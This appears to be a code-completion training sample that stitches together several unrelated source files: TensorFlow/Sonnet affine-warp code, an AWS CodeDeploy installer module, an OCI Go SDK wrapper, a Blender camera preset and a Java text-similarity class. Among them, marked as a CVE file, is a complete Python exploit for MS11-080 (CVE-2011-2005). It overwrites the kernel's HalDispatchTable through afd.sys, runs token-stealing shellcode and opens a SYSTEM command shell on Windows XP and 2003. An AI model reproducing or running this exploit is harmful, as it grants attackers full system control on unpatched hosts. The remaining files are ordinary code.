x_i += np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
features.append(x_i)
features += offsets
return features
def _build(self, inputs):
"""Assembles the module network and adds it to the graph.
The internal computation graph is assembled according to the set of
constraints provided at construction time.
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A batch of warped grids.
Raises:
Error: If the input tensor size is not consistent with the constraints
passed at construction time.
"""
input_shape = tf.shape(inputs)
input_dtype = inputs.dtype.as_numpy_dtype
batch_size = tf.expand_dims(input_shape[0], 0)
number_of_params = inputs.get_shape()[1]
if number_of_params != self._constraints.num_free_params:
raise base.Error('Input size is not consistent with constraint '
'definition: {} parameters expected, {} provided.'
.format(self._constraints.num_free_params,
number_of_params))
num_output_dimensions = len(self._psi) // 3
def get_input_slice(start, size):
"""Extracts a subset of columns from the input 2D Tensor."""
return basic.SliceByDim([1], [start], [size])(inputs)
warped_grid = []
var_index_offset = 0
number_of_points = np.prod(self._output_shape)
for i in xrange(num_output_dimensions):
if self._psi[i] is not None:
# The i-th output dimension is not fully specified by the constraints,
# the graph is setup to perform matrix multiplication in batch mode.
grid_coord = self._psi[i].astype(input_dtype)
num_active_vars = self._psi[i].shape[0]
active_vars = get_input_slice(var_index_offset, num_active_vars)
warped_coord = tf.matmul(active_vars, grid_coord)
warped_coord = tf.expand_dims(warped_coord, 1)
var_index_offset += num_active_vars
offset = self._psi[num_output_dimensions + i]
if offset is not None:
offset = offset.astype(input_dtype)
# Some entries in the i-th row of the affine matrix were constrained
# and the corresponding matrix multiplications have been precomputed.
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(offset.shape)
],
0)
offset = offset.reshape((1, 1) + offset.shape)
warped_coord += tf.tile(offset, tiling_params)
else:
# The i-th output dimension is fully specified by the constraints, and
# the corresponding matrix multiplications have been precomputed.
warped_coord = self._psi[num_output_dimensions + i].astype(input_dtype)
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(warped_coord.shape)
],
0)
warped_coord = warped_coord.reshape((1, 1) + warped_coord.shape)
warped_coord = tf.tile(warped_coord, tiling_params)
warped_coord += self._psi[i + 2 * num_output_dimensions]
# Need to help TF figuring out shape inference since tiling information
# is held in Tensors which are not known until run time.
warped_coord.set_shape([None, 1, number_of_points])
warped_grid.append(warped_coord)
# Reshape all the warped coordinates tensors to match the specified output
# shape and concatenate into a single matrix.
grid_shape = self._output_shape + (1,)
warped_grid = [basic.BatchReshape(grid_shape)(grid) for grid in warped_grid]
return tf.concat(warped_grid, len(grid_shape))
@property
def constraints(self):
return self._constraints
def inverse(self, name=None):
"""Returns a `sonnet` module to compute inverse affine transforms.
The function first assembles a network that given the constraints of the
current AffineGridWarper and a set of input parameters, retrieves the
coefficients of the corresponding inverse affine transform, then feeds its
output into a new AffineGridWarper setup to correctly warp the `output`
space into the `source` space.
Args:
name: Name of module implementing the inverse grid transformation.
Returns:
A `sonnet` module performing the inverse affine transform of a reference
grid of points via an AffineGridWarper module.
Raises:
tf.errors.UnimplementedError: If the function is called on a non 2D
instance of AffineGridWarper.
"""
if self._num_coeff != 6:
      raise tf.errors.UnimplementedError('AffineGridWarper currently supports '
'inversion only for the 2D case.')
def _affine_grid_warper_inverse(inputs):
"""Assembles network to compute inverse affine transformation.
      Each `inputs` row potentially contains [a, b, tx, c, d, ty]
corresponding to an affine matrix:
A = [a, b, tx],
[c, d, ty]
We want to generate a tensor containing the coefficients of the
corresponding inverse affine transformation in a constraints-aware
fashion.
Calling M:
M = [a, b]
[c, d]
the affine matrix for the inverse transform is:
      A_inv = [M^(-1), M^(-1) * [-tx, -ty]^T]
where
M^(-1) = (ad - bc)^(-1) * [ d, -b]
[-c, a]
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A tensorflow graph performing the inverse affine transformation
parametrized by the input coefficients.
"""
batch_size = tf.expand_dims(tf.shape(inputs)[0], 0)
constant_shape = tf.concat([batch_size, tf.convert_to_tensor((1,))], 0)
index = iter(range(6))
def get_variable(constraint):
if constraint is None:
i = next(index)
return inputs[:, i:i+1]
else:
return tf.fill(constant_shape, tf.constant(constraint,
dtype=inputs.dtype))
constraints = chain.from_iterable(self.constraints)
a, b, tx, c, d, ty = (get_variable(constr) for constr in constraints)
det = a * d - b * c
a_inv = d / det
b_inv = -b / det
c_inv = -c / det
d_inv = a / det
m_inv = basic.BatchReshape(
[2, 2])(tf.concat([a_inv, b_inv, c_inv, d_inv], 1))
txy = tf.expand_dims(tf.concat([tx, ty], 1), 2)
txy_inv = basic.BatchFlatten()(tf.matmul(m_inv, txy))
tx_inv = txy_inv[:, 0:1]
ty_inv = txy_inv[:, 1:2]
inverse_gw_inputs = tf.concat(
[a_inv, b_inv, -tx_inv, c_inv, d_inv, -ty_inv], 1)
agw = AffineGridWarper(self.output_shape,
self.source_shape)
return agw(inverse_gw_inputs) # pylint: disable=not-callable
if name is None:
name = self.module_name + '_inverse'
return base.Module(_affine_grid_warper_inverse, name=name)
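# A minimal usage sketch for the warper and its inverse (shapes and setup are
# illustrative, not taken from this file):
#
#   warper = AffineGridWarper(source_shape=(10, 10), output_shape=(4, 4),
#                             constraints=AffineWarpConstraints.no_shear_2d())
#   params = tf.placeholder(tf.float32,
#                           [None, warper.constraints.num_free_params])
#   grid = warper(params)                # [batch, 4, 4, 2] warped coordinates
#   inv_grid = warper.inverse()(params)  # warps output space back to source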
class AffineWarpConstraints(object):
"""Affine warp contraints class.
`AffineWarpConstraints` allow for very succinct definitions of constraints on
the values of entries in affine transform matrices.
"""
def __init__(self, constraints=((None,) * 3,) * 2):
"""Creates a constraint definition for an affine transformation.
Args:
constraints: A doubly-nested iterable of shape `[N, N+1]` defining
constraints on the entries of a matrix that represents an affine
transformation in `N` dimensions. A numeric value bakes in a constraint
        on the corresponding entry in the transformation matrix, whereas `None`
implies that the corresponding entry will be specified at run time.
Raises:
TypeError: If `constraints` is not a nested iterable.
ValueError: If the double iterable `constraints` has inconsistent
dimensions.
"""
try:
self._constraints = tuple(tuple(x) for x in constraints)
except TypeError:
raise TypeError('constraints must be a nested iterable.')
# Number of rows
self._num_dim = len(self._constraints)
expected_num_cols = self._num_dim + 1
if any(len(x) != expected_num_cols for x in self._constraints):
raise ValueError('The input list must define a Nx(N+1) matrix of '
                       'constraints.')
def _calc_mask(self):
"""Computes a boolean mask from the user defined constraints."""
mask = []
for row in self._constraints:
mask.append(tuple(x is None for x in row))
return tuple(mask)
def _calc_num_free_params(self):
"""Computes number of non constrained parameters."""
return sum(row.count(None) for row in self._constraints)
@property
def num_free_params(self):
return self._calc_num_free_params()
@property
def mask(self):
return self._calc_mask()
@property
def constraints(self):
return self._constraints
@property
def num_dim(self):
return self._num_dim
def __getitem__(self, i):
"""Returns the list of constraints for the i-th row of the affine matrix."""
return self._constraints[i]
def _combine(self, x, y):
"""Combines two constraints, raising an error if they are not compatible."""
if x is None or y is None:
return x or y
if x != y:
raise ValueError('Incompatible set of constraints provided.')
return x
def __and__(self, rhs):
"""Combines two sets of constraints into a coherent single set."""
return self.combine_with(rhs)
def combine_with(self, additional_constraints):
"""Combines two sets of constraints into a coherent single set."""
x = additional_constraints
if not isinstance(additional_constraints, AffineWarpConstraints):
x = AffineWarpConstraints(additional_constraints)
new_constraints = []
for left, right in zip(self._constraints, x.constraints):
new_constraints.append([self._combine(x, y) for x, y in zip(left, right)])
return AffineWarpConstraints(new_constraints)
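  # A hand-worked example of combining constraints (uses the classmethods
  # defined below; values checked by inspection, not from a test suite):
  #
  #   c = (AffineWarpConstraints.translation_2d(x=0, y=0) &
  #        AffineWarpConstraints.scale_2d(x=1, y=1))
  #   c.constraints     == ((1, None, 0), (None, 1, 0))
  #   c.num_free_params == 2   # only the two shear entries remain free
  #
  # Conflicting numeric values for the same entry raise a ValueError.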
  # Collection of utilities to initialize an AffineGridWarper in 2D and 3D.
@classmethod
def no_constraints(cls, num_dim=2):
"""Empty set of constraints for a num_dim-ensional affine transform."""
return cls(((None,) * (num_dim + 1),) * num_dim)
@classmethod
def translation_2d(cls, x=None, y=None):
"""Assign contraints on translation components of affine transform in 2d."""
return cls([[None, None, x],
[None, None, y]])
@classmethod
def translation_3d(cls, x=None, y=None, z=None):
"""Assign contraints on translation components of affine transform in 3d."""
return cls([[None, None, None, x],
[None, None, None, y],
[None, None, None, z]])
@classmethod
def scale_2d(cls, x=None, y=None):
"""Assigns contraints on scaling components of affine transform in 2d."""
return cls([[x, None, None],
[None, y, None]])
@classmethod
def scale_3d(cls, x=None, y=None, z=None):
"""Assigns contraints on scaling components of affine transform in 3d."""
return cls([[x, None, None, None],
[None, y, None, None],
[None, None, z, None]])
@classmethod
def shear_2d(cls, x=None, y=None):
"""Assigns contraints on shear components of affine transform in 2d."""
return cls([[None, x, None],
[y, None, None]])
@classmethod
def no_shear_2d(cls):
return cls.shear_2d(x=0, y=0)
@classmethod
def no_shear_3d(cls):
"""Assigns contraints on shear components of affine transform in 3d."""
return cls([[None, 0, 0, None],
[0, None, 0, None],
[0, 0, None, None]])<|fim▁end|>
|
if len(self._output_shape) > len(self._source_shape):
raise base.Error('Output domain dimensionality ({}) must be equal or '
|
<|file_name|>CVE-2011-2005.py<|end_file_name|><|fim▁begin|>################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - [email protected]"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
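## Load the kernel image in user mode to resolve the exported
## HalDispatchTable, then rebase that address onto the real kernel base.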
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
<|fim▁hole|> _TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"
shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"<|fim▁end|>
|
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
|
<|file_name|>systems.py<|end_file_name|><|fim▁begin|># Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import ctypes
import os
import subprocess
DEFAULT_CONFIG_FILE = 'codedeploy.onpremises.yml'
class System:
UNSUPPORTED_SYSTEM_MSG = (
'Only Ubuntu Server, Red Hat Enterprise Linux Server and '
'Windows Server operating systems are supported.'
)
def __init__(self, params):
self.session = params.session
self.s3 = self.session.create_client(
's3',
region_name=params.region
)
def validate_administrator(self):
raise NotImplementedError('validate_administrator')
def install(self, params):
raise NotImplementedError('install')
def uninstall(self, params):
raise NotImplementedError('uninstall')
class Windows(System):
CONFIG_DIR = r'C:\ProgramData\Amazon\CodeDeploy'
CONFIG_FILE = 'conf.onpremises.yml'
CONFIG_PATH = r'{0}\{1}'.format(CONFIG_DIR, CONFIG_FILE)
INSTALLER = 'codedeploy-agent.msi'
def validate_administrator(self):
if not ctypes.windll.shell32.IsUserAnAdmin():
raise RuntimeError(
'You must run this command as an Administrator.'
)
def install(self, params):
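        # Stop a running agent if present, pull the MSI from S3, install it
        # quietly, then restart the service and verify that it is running.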
if 'installer' in params:
self.INSTALLER = params.installer
process = subprocess.Popen(
[
'powershell.exe',
'-Command', 'Stop-Service',
'-Name', 'codedeployagent'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
not_found = (
"Cannot find any service with service name 'codedeployagent'"
)
if process.returncode != 0 and not_found not in error:
raise RuntimeError(
'Failed to stop the AWS CodeDeploy Agent:\n{0}'.format(error)
)
response = self.s3.get_object(Bucket=params.bucket, Key=params.key)
with open(self.INSTALLER, 'wb') as f:
f.write(response['Body'].read())
subprocess.check_call(
[
r'.\{0}'.format(self.INSTALLER),
'/quiet',
'/l', r'.\codedeploy-agent-install-log.txt'
],
shell=True
)
subprocess.check_call([
'powershell.exe',
'-Command', 'Restart-Service',
'-Name', 'codedeployagent'
])
process = subprocess.Popen(
[
'powershell.exe',
'-Command', 'Get-Service',
'-Name', 'codedeployagent'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
if "Running" not in output:
raise RuntimeError(
'The AWS CodeDeploy Agent did not start after installation.'
)
def uninstall(self, params):
process = subprocess.Popen(
[
'powershell.exe',
'-Command', 'Stop-Service',
'-Name', 'codedeployagent'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
not_found = (
"Cannot find any service with service name 'codedeployagent'"
)
if process.returncode == 0:
self._remove_agent()
elif not_found not in error:
raise RuntimeError(
'Failed to stop the AWS CodeDeploy Agent:\n{0}'.format(error)
)
def _remove_agent(self):
process = subprocess.Popen(
[
'wmic',
'product', 'where', 'name="CodeDeploy Host Agent"',
'call', 'uninstall', '/nointeractive'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
if process.returncode != 0:
raise RuntimeError(
'Failed to uninstall the AWS CodeDeploy Agent:\n{0}'.format(
error
)
)
class Linux(System):
CONFIG_DIR = '/etc/codedeploy-agent/conf'
CONFIG_FILE = DEFAULT_CONFIG_FILE
CONFIG_PATH = '{0}/{1}'.format(CONFIG_DIR, CONFIG_FILE)
INSTALLER = 'install'
def validate_administrator(self):
if os.geteuid() != 0:
raise RuntimeError('You must run this command as sudo.')
def install(self, params):
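        # Update system packages, stop any running agent, download the
        # installer from S3, and run it with the session's AWS credentials.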
if 'installer' in params:
self.INSTALLER = params.installer
self._update_system(params)
self._stop_agent(params)
response = self.s3.get_object(Bucket=params.bucket, Key=params.key)
with open(self.INSTALLER, 'wb') as f:
f.write(response['Body'].read())
subprocess.check_call(
['chmod', '+x', './{0}'.format(self.INSTALLER)]
)
credentials = self.session.get_credentials()
environment = os.environ.copy()
environment['AWS_REGION'] = params.region
environment['AWS_ACCESS_KEY_ID'] = credentials.access_key
environment['AWS_SECRET_ACCESS_KEY'] = credentials.secret_key
if credentials.token is not None:
environment['AWS_SESSION_TOKEN'] = credentials.token
subprocess.check_call(
['./{0}'.format(self.INSTALLER), 'auto'],
env=environment<|fim▁hole|> def uninstall(self, params):
process = self._stop_agent(params)
if process.returncode == 0:
self._remove_agent(params)
def _update_system(self, params):
        raise NotImplementedError('update_system')
def _remove_agent(self, params):
raise NotImplementedError('remove_agent')
def _stop_agent(self, params):
process = subprocess.Popen(
['service', 'codedeploy-agent', 'stop'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
(output, error) = process.communicate()
if process.returncode != 0 and params.not_found_msg not in error:
raise RuntimeError(
'Failed to stop the AWS CodeDeploy Agent:\n{0}'.format(error)
)
return process
class Ubuntu(Linux):
def _update_system(self, params):
subprocess.check_call(['apt-get', '-y', 'update'])
subprocess.check_call(['apt-get', '-y', 'install', 'ruby2.0'])
def _remove_agent(self, params):
subprocess.check_call(['dpkg', '-r', 'codedeploy-agent'])
def _stop_agent(self, params):
params.not_found_msg = 'codedeploy-agent: unrecognized service'
return Linux._stop_agent(self, params)
class RHEL(Linux):
def _update_system(self, params):
subprocess.check_call(['yum', '-y', 'install', 'ruby'])
def _remove_agent(self, params):
subprocess.check_call(['yum', '-y', 'erase', 'codedeploy-agent'])
def _stop_agent(self, params):
params.not_found_msg = 'Redirecting to /bin/systemctl stop codedeploy-agent.service'
return Linux._stop_agent(self, params)<|fim▁end|>
|
)
|
<|file_name|>index.test-d.ts<|end_file_name|><|fim▁begin|>import http from 'node:http';
import {expectType} from 'tsd';
import decompressResponse, {UncompressedIncomingMessage} from './index.js';
http.get('localhost', response => {
expectType<UncompressedIncomingMessage>(decompressResponse(response));<|fim▁hole|><|fim▁end|>
|
});
|
<|file_name|>get_autonomous_patch_request_response.go<|end_file_name|><|fim▁begin|><|fim▁hole|>package database
import (
"github.com/oracle/oci-go-sdk/v46/common"
"net/http"
)
// GetAutonomousPatchRequest wrapper for the GetAutonomousPatch operation
//
// See also
//
// Click https://docs.cloud.oracle.com/en-us/iaas/tools/go-sdk-examples/latest/database/GetAutonomousPatch.go.html to see an example of how to use GetAutonomousPatchRequest.
type GetAutonomousPatchRequest struct {
// The autonomous patch OCID (https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).
AutonomousPatchId *string `mandatory:"true" contributesTo:"path" name:"autonomousPatchId"`
// Unique Oracle-assigned identifier for the request.
// If you need to contact Oracle about a particular request, please provide the request ID.
OpcRequestId *string `mandatory:"false" contributesTo:"header" name:"opc-request-id"`
// Metadata about the request. This information will not be transmitted to the service, but
// represents information that the SDK will consume to drive retry behavior.
RequestMetadata common.RequestMetadata
}
func (request GetAutonomousPatchRequest) String() string {
return common.PointerString(request)
}
// HTTPRequest implements the OCIRequest interface
func (request GetAutonomousPatchRequest) HTTPRequest(method, path string, binaryRequestBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (http.Request, error) {
return common.MakeDefaultHTTPRequestWithTaggedStructAndExtraHeaders(method, path, request, extraHeaders)
}
// BinaryRequestBody implements the OCIRequest interface
func (request GetAutonomousPatchRequest) BinaryRequestBody() (*common.OCIReadSeekCloser, bool) {
return nil, false
}
// RetryPolicy implements the OCIRetryableRequest interface. This retrieves the specified retry policy.
func (request GetAutonomousPatchRequest) RetryPolicy() *common.RetryPolicy {
return request.RequestMetadata.RetryPolicy
}
// GetAutonomousPatchResponse wrapper for the GetAutonomousPatch operation
type GetAutonomousPatchResponse struct {
// The underlying http response
RawResponse *http.Response
// The AutonomousPatch instance
AutonomousPatch `presentIn:"body"`
// For optimistic concurrency control. See `if-match`.
Etag *string `presentIn:"header" name:"etag"`
// Unique Oracle-assigned identifier for the request. If you contact Oracle about
// a particular request, then you must provide the request ID.
OpcRequestId *string `presentIn:"header" name:"opc-request-id"`
}
func (response GetAutonomousPatchResponse) String() string {
return common.PointerString(response)
}
// HTTPResponse implements the OCIResponse interface
func (response GetAutonomousPatchResponse) HTTPResponse() *http.Response {
return response.RawResponse
}<|fim▁end|>
|
// Copyright (c) 2016, 2018, 2021, Oracle and/or its affiliates. All rights reserved.
// This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
// Code generated. DO NOT EDIT.
|
<|file_name|>Nikon_D7000.py<|end_file_name|><|fim▁begin|>import bpy
bpy.context.object.data.sensor_width = 23.6
bpy.context.object.data.sensor_height = 15.6<|fim▁hole|>bpy.context.object.data.sensor_fit = 'HORIZONTAL'<|fim▁end|>
| |
<|file_name|>BagModel.java<|end_file_name|><|fim▁begin|>/*
* Copyright [2016-2020] [George Papadakis ([email protected])]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.scify.jedai.textmodels;
import org.scify.jedai.utilities.enumerations.RepresentationModel;
import org.scify.jedai.utilities.enumerations.SimilarityMetric;
import gnu.trove.iterator.TObjectIntIterator;
import gnu.trove.map.TObjectIntMap;
import gnu.trove.map.hash.TObjectIntHashMap;
import java.util.HashSet;
import java.util.Set;
/**
*
* @author G.A.P. II
*/
public abstract class BagModel extends AbstractModel {
protected float noOfTotalTerms;
protected final TObjectIntMap<String> itemsFrequency;
public BagModel(int dId, int n, RepresentationModel md, SimilarityMetric sMetric, String iName) {
super(dId, n, md, sMetric, iName);
itemsFrequency = new TObjectIntHashMap<>();
}
@Override
public void finalizeModel() {
}
protected float getEnhancedJaccardSimilarity(BagModel oModel) {
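        // Iterate over the smaller term-frequency vector; the numerator sums
        // the minimum shared frequency of each term in both models.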
TObjectIntMap<String> itemVector1 = itemsFrequency;
TObjectIntMap<String> itemVector2 = oModel.getItemsFrequency();
if (itemVector2.size() < itemVector1.size()) {
itemVector1 = oModel.getItemsFrequency();
itemVector2 = itemsFrequency;
}
float numerator = 0.0f;
for (TObjectIntIterator<String> iterator = itemVector1.iterator(); iterator.hasNext();) {
iterator.advance();
numerator += Math.min(iterator.value(), itemVector2.get(iterator.key()));
}
float denominator = noOfTotalTerms + oModel.getNoOfTotalTerms() - numerator;
return numerator / denominator;
}
@Override
public float getEntropy(boolean normalized) {
float entropy = 0.0f;
for (TObjectIntIterator<String> iterator = itemsFrequency.iterator(); iterator.hasNext();) {
iterator.advance();
float p_i = (iterator.value() / noOfTotalTerms);
entropy -= (p_i * (Math.log10(p_i) / Math.log10(2.0d)));
}
if (normalized) {
float maxEntropy = (float) Math.log10(noOfTotalTerms) / (float) Math.log10(2.0f);
return entropy / maxEntropy;
}
return entropy;
}
public TObjectIntMap<String> getItemsFrequency() {
return itemsFrequency;
}
protected float getJaccardSimilarity(BagModel oModel) {
final Set<String> commonKeys = new HashSet<>(itemsFrequency.keySet());
commonKeys.retainAll(oModel.getItemsFrequency().keySet());
float numerator = commonKeys.size();
float denominator = itemsFrequency.size() + oModel.getItemsFrequency().size() - numerator;
return numerator / denominator;
}
